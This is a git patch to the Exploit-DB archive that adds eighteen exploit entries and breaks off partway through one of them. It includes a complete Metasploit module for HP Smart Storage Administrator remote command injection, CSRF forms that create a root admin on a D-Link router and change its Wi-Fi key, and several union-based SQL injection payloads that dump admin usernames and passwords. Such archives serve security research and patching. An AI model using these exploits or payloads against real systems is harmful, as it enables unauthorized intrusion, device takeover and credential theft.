From dcc7720ad63a15e7236510e101d2cba1c5766c2c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 11 Feb 2017 05:01:16 +0000
Subject: [PATCH] DB: 2017-02-11

18 new exploits

Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
F5 BIG-IP SSL Virtual Server - Memory Disclosure
CMS Lite 1.3.1 - SQL Injection
Tiger Post 3.0.1 - SQL Injection
Gram Post 1.0 - SQL Injection
Youtube Analytics Multi Channel 3.0 - SQL Injection
Collabo - Arbitrary File Download
Takas Classified 1.1 - SQL Injection
Zigaform - SQL Injection
Multilanguage Estate Agency Pro 1.2 - SQL Injection
QWIKIA 1.1.1 - SQL Injection
Automated Job Portal Script - SQL Injection
CLUB-8 EMS - SQL Injection
Uploadr - SQL Injection
CodePaul ClipMass - SQL Injection
Video Subscription - SQL Injection
D-link DIR-600M - Cross-Site Request Forgery
HotelCMS with Booking Engine - SQL Injection
---
 files.csv                             |  20 ++-
 platforms/hardware/remote/41298.txt   |  12 ++
 platforms/hardware/webapps/41299.html |  92 +++++++++++++
 platforms/multiple/remote/41297.rb    | 178 ++++++++++++++++++++++++++
 platforms/php/webapps/41290.txt       |  18 +++
 platforms/php/webapps/41291.txt       |  20 +++
 platforms/php/webapps/41292.txt       |  20 +++
 platforms/php/webapps/41293.txt       |  19 +++
 platforms/php/webapps/41294.txt       |  19 +++
 platforms/php/webapps/41295.txt       |  23 ++++
 platforms/php/webapps/41296.txt       |  18 +++
 platforms/php/webapps/41300.txt       |  17 +++
 platforms/php/webapps/41301.txt       |  17 +++
 platforms/php/webapps/41302.txt       |  23 ++++
 platforms/php/webapps/41303.txt       |  22 ++++
 platforms/php/webapps/41304.txt       |  18 +++
 platforms/php/webapps/41305.txt       |  17 +++
 platforms/php/webapps/41306.txt       |  17 +++
 platforms/php/webapps/41307.txt       |  17 +++
 19 files changed, 586 insertions(+), 1 deletion(-)
 create mode 100755 platforms/hardware/remote/41298.txt
 create mode 100755 platforms/hardware/webapps/41299.html
 create mode 100755 platforms/multiple/remote/41297.rb
 create mode 100755 platforms/php/webapps/41290.txt
 create mode 100755 platforms/php/webapps/41291.txt
 create mode 100755 platforms/php/webapps/41292.txt
 create mode 100755 platforms/php/webapps/41293.txt
 create mode 100755 platforms/php/webapps/41294.txt
 create mode 100755 platforms/php/webapps/41295.txt
 create mode 100755 platforms/php/webapps/41296.txt
 create mode 100755 platforms/php/webapps/41300.txt
 create mode 100755 platforms/php/webapps/41301.txt
 create mode 100755 platforms/php/webapps/41302.txt
 create mode 100755 platforms/php/webapps/41303.txt
 create mode 100755 platforms/php/webapps/41304.txt
 create mode 100755 platforms/php/webapps/41305.txt
 create mode 100755 platforms/php/webapps/41306.txt
 create mode 100755 platforms/php/webapps/41307.txt

diff --git a/files.csv b/files.csv
index 1c5cd18c8..c0a1fcc4e 100644
--- a/files.csv
+++ b/files.csv
@@ -8600,7 +8600,7 @@ id,file,description,date,author,platform,type,port
 39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
 39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
-39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
@@ -15264,6 +15264,8 @@ id,file,description,date,author,platform,type,port
 41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
 41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0
 41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0
+41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
+41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37209,3 +37211,19 @@ id,file,description,date,author,platform,type,port
 41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
+41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41291,platforms/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41292,platforms/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41293,platforms/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41294,platforms/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps,0
+41295,platforms/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41296,platforms/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41300,platforms/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41301,platforms/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41302,platforms/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41303,platforms/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
+41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/hardware/remote/41298.txt b/platforms/hardware/remote/41298.txt
new file mode 100755
index 000000000..cf6120f72
--- /dev/null
+++ b/platforms/hardware/remote/41298.txt
@@ -0,0 +1,12 @@
+/*
+# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
+# Date: [10.02.2017]
+# Exploit Author: [Ege BalcÄ±]
+# Vendor Homepage: [https://f5.com/]
+# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
+# Tested on: [Multiple]
+# CVE : [CVE-2016-9244]
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41299.html b/platforms/hardware/webapps/41299.html
new file mode 100755
index 000000000..8643710d2
--- /dev/null
+++ b/platforms/hardware/webapps/41299.html
@@ -0,0 +1,92 @@
+# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
+# Google Dork:N/A
+# Date: 07/02/2017
+# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
+# Vendor Homepage:dlink.com
+# Software Link:N/A
+# Version:Hardware version: C1  
+          Firmware version: 3.03
+# Tested on:All Platforms
+# CVE :CVE-2017-5874
+
+Abstract:
+=======
+ 
+Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker 
+to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
+ 
+ 
+Exploitation-Technique:
+===================
+Remote
+ 
+Severity Rating:
+===================
+ 
+7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
+
+Details:
+=======
+An attacker who lures a DIR-600M authenticated user to browse a malicious website 
+can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
+ 
+Proof Of Concept code:
+====================
+ 
+1. Add new user with root access
+
+ <html>
+   <!-- CSRF PoC - by Ajay Kulal -->
+   <body>
+     <form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
+       <input type="hidden" name="username" value="AK" />
+       <input type="hidden" name="privilege" value="2" />
+       <input type="hidden" name="newpass" value="dolphin" />
+       <input type="hidden" name="confpass" value="dolphin" />
+       <input type="hidden" name="adduser" value="Add" />
+       <input type="hidden" name="hiddenpass" value="" />
+       <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+ </html>
+
+
+
+
+2. changing wireless password
+
+ <html>
+   <!-- CSRF PoC - by Ajay Kulal -->
+   <body>
+     <form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
+       <input type="hidden" name="domain" value="1" />
+       <input type="hidden" name="hiddenSSID" value="on" />
+       <input type="hidden" name="ssid" value="Dravidian" />
+       <input type="hidden" name="band" value="10" />
+       <input type="hidden" name="chan" value="0" />
+       <input type="hidden" name="chanwid" value="1" />
+       <input type="hidden" name="txRate" value="0" />
+       <input type="hidden" name="method&#95;cur" value="0" />
+       <input type="hidden" name="method" value="2" />
+       <input type="hidden" name="authType" value="2" />
+       <input type="hidden" name="length" value="1" />
+       <input type="hidden" name="format" value="2" />
+       <input type="hidden" name="defaultTxKeyId" value="1" />
+       <input type="hidden" name="key1" value="0000000000" />
+       <input type="hidden" name="pskFormat" value="0" />
+       <input type="hidden" name="pskValue" value="password123" />
+       <input type="hidden" name="checkWPS2" value="1" />
+       <input type="hidden" name="save" value="Apply" />
+       <input type="hidden" name="basicrates" value="15" />
+       <input type="hidden" name="operrates" value="4095" />
+       <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+ </html>
+
+
+
+
+
diff --git a/platforms/multiple/remote/41297.rb b/platforms/multiple/remote/41297.rb
new file mode 100755
index 000000000..c702ca4fa
--- /dev/null
+++ b/platforms/multiple/remote/41297.rb
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Smart Storage Administrator Remote Command Injection",
+      'Description'    => %q{
+        This module exploits a vulnerability found in HP Smart Storage Administrator. By
+        supplying a specially crafted HTTP request, it is possible to control the
+        'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
+        which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nicolas Mattiocco (@MaKyOtOx)'  # Discovery & multi-platform Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2016-8523']
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'Platform'       => %w{ linux win },
+      'Targets'        =>
+        [
+          ['Linux', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86,
+            'CmdStagerFlavor' => 'bourne'
+          }],
+          ['Linux (x64)', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86_64,
+            'CmdStagerFlavor' => 'bourne'
+          }],
+          ['Windows', {
+            'Platform' => 'win',
+            'Arch' => ARCH_X86,
+            'CmdStagerFlavor' => 'certutil'
+          }],
+          ['Windows (x64)', {
+            'Platform' => 'win',
+            'Arch' => ARCH_X86_64,
+            'CmdStagerFlavor' => 'certutil'
+          }],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jan 30 2017"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(2381),
+        # USERNAME/PASS may not be necessary, because the anonymous access is possible
+        OptString.new("USERNAME", [false, 'The username to authenticate as']),
+        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+
+    @cookie = ''
+
+    sig = Rex::Text.rand_text_alpha(8)
+    cmd = "&echo%20#{sig}&echo"
+    res = send_command(cmd, true)
+    if not res
+      vprint_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.headers.to_s() =~ /#{sig}/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    cookie = ''
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/proxy/ssllogin',
+      'vars_post' => {
+        'redirecturl'         => '',
+        'redirectquerystring' => '',
+        'user'                => username,
+        'password'            => password
+      }
+    })
+
+    if not res
+      fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
+    end
+
+    # CpqElm-Login: success
+    if res.headers['CpqElm-Login'].to_s =~ /success/
+      cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+    end
+
+    cookie
+  end
+
+
+  def setup_stager
+    execute_cmdstager(:temp => './', :linemax => 2800)
+  end
+
+
+  def execute_command(cmd, opts={})
+    res = send_command(cmd, false)
+    if res && res.code != 200
+      vprint_error("Unexpected response:\n#{res}")
+      fail_with(Failure::Unknown, "There was an unexpected response")
+    end
+  end
+
+
+  def send_command(cmd, check)
+    if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
+      @cookie = login
+      if @cookie.empty?
+        fail_with(Failure::NoAccess, "#{peer} - Login failed")
+      else
+        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+      end
+    end
+
+    req_opts = {}
+
+    # For the check() function, use GET method
+    if check
+      req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
+      req_opts['method'] = "GET"
+    else
+      req_opts['uri'] = "/HPSSA/index.htm"
+      req_opts['method'] = "POST"
+      req_opts['vars_post'] = {'msf'=>'red'}
+      case target.opts['Platform']
+        when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
+        when "win"   then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
+      end
+    end
+
+    unless @cookie.empty?
+      browser_chk = 'HPSMH-browser-check=done for this session'
+      curl_loc    = "curlocation-#{datastore['USERNAME']}="
+      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+    end
+
+    send_request_cgi(req_opts)
+  end
+
+  def exploit
+    @cookie = ''
+
+    setup_stager
+  end
+end
+
diff --git a/platforms/php/webapps/41290.txt b/platforms/php/webapps/41290.txt
new file mode 100755
index 000000000..92c1820da
--- /dev/null
+++ b/platforms/php/webapps/41290.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://www.cmslite.co.uk/
+# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
+# Demo: http://www.cmslite.co.uk/
+# Version: 1.3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?Style=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41291.txt b/platforms/php/webapps/41291.txt
new file mode 100755
index 000000000..2be4327e5
--- /dev/null
+++ b/platforms/php/webapps/41291.txt
@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles  v3.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075
+# Demo: http://demo.vtcreators.com/tigerpost/
+# Version: 3.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
+# -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41292.txt b/platforms/php/webapps/41292.txt
new file mode 100755
index 000000000..b74db69f7
--- /dev/null
+++ b/platforms/php/webapps/41292.txt
@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title:  Gram Post - Instagram Auto Post Multi Accounts with Paypal integration v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/gram-post-instagram-auto-post-multi-accounts-with-paypal-integration/19264650
+# Demo: http://demo.vtcreators.com/grampost/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/instagram_accounts/update?id=[SQL]
+# -9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41293.txt b/platforms/php/webapps/41293.txt
new file mode 100755
index 000000000..1d5de4a55
--- /dev/null
+++ b/platforms/php/webapps/41293.txt
@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
+# Demo: http://demo.vtcreators.com/yamc/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41294.txt b/platforms/php/webapps/41294.txt
new file mode 100755
index 000000000..d7238c2c1
--- /dev/null
+++ b/platforms/php/webapps/41294.txt
@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Collabo - TeamBusiness Collaboration Network - Arbitrary File Download
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://321-internet.com/
+# Software Buy: https://codecanyon.net/item/collabo-teambusiness-collaboration-network/15242543
+# Demo: http://321-internet.com/codecanyon/collabo/demo/collabo/index.php
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# Login as regular user
+# http://localhost/[PATH]/download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41295.txt b/platforms/php/webapps/41295.txt
new file mode 100755
index 000000000..206028e88
--- /dev/null
+++ b/platforms/php/webapps/41295.txt
@@ -0,0 +1,23 @@
+# # # # # 
+# Exploit Title: Takas Classified – Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://artifectx.com/
+# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
+# Demo: http://takas.artifectx.com/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
+# Etc... Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41296.txt b/platforms/php/webapps/41296.txt
new file mode 100755
index 000000000..065c8c5d9
--- /dev/null
+++ b/platforms/php/webapps/41296.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://php-form-builder.zigaform.com/
+# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
+# Demo: http://demo-phpformbuilder.zigaform.com/index.php
+# Version: 2.9.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41300.txt b/platforms/php/webapps/41300.txt
new file mode 100755
index 000000000..8eb257cba
--- /dev/null
+++ b/platforms/php/webapps/41300.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Multilanguage Estate Agency Pro 1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://djrust26.hu/
+# Software Buy: https://codecanyon.net/item/multilanguage-estate-agency-pro-12/14521069
+# Demo: http://djrust26.hu/realestate/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/property_show.php?id=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41301.txt b/platforms/php/webapps/41301.txt
new file mode 100755
index 000000000..56195036e
--- /dev/null
+++ b/platforms/php/webapps/41301.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: QWIKIA - Ask And Answer Platform 1.1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://xandr.co/
+# Software Buy: http://xandr.co/portfolio/qwikia
+# Demo: http://qwikia.xandr.co/
+# Version: 1.1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?q=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41302.txt b/platforms/php/webapps/41302.txt
new file mode 100755
index 000000000..886e11c40
--- /dev/null
+++ b/platforms/php/webapps/41302.txt
@@ -0,0 +1,23 @@
+# # # # # 
+# Exploit Title: Automated Job Portal Script - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://www.jagaad.com/
+# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
+# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/jobdetail.php?id=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
+# 
+# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
+# 
+# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
\ No newline at end of file
diff --git a/platforms/php/webapps/41303.txt b/platforms/php/webapps/41303.txt
new file mode 100755
index 000000000..86fe8afc8
--- /dev/null
+++ b/platforms/php/webapps/41303.txt
@@ -0,0 +1,22 @@
+# # # # # 
+# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://rexbd.net/
+# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
+# Demo: http://ems.rexbd.net/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as sales man user
+# http://localhost/[PATH]/editwatch.php?id=[SQL]
+-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
+#
+# http://localhost/[PATH]/editwatch.php?id=[SQL]
+-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41304.txt b/platforms/php/webapps/41304.txt
new file mode 100755
index 000000000..f4d3fb39c
--- /dev/null
+++ b/platforms/php/webapps/41304.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Uploadr - Project Files Management - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://lagunaproperty.com/
+# Software Buy: https://codecanyon.net/item/uploadr-project-files-management/13545125
+# Demo: http://download.lagunaproperty.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# http://localhost/[PATH]/download?file=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41305.txt b/platforms/php/webapps/41305.txt
new file mode 100755
index 000000000..26a289cb3
--- /dev/null
+++ b/platforms/php/webapps/41305.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
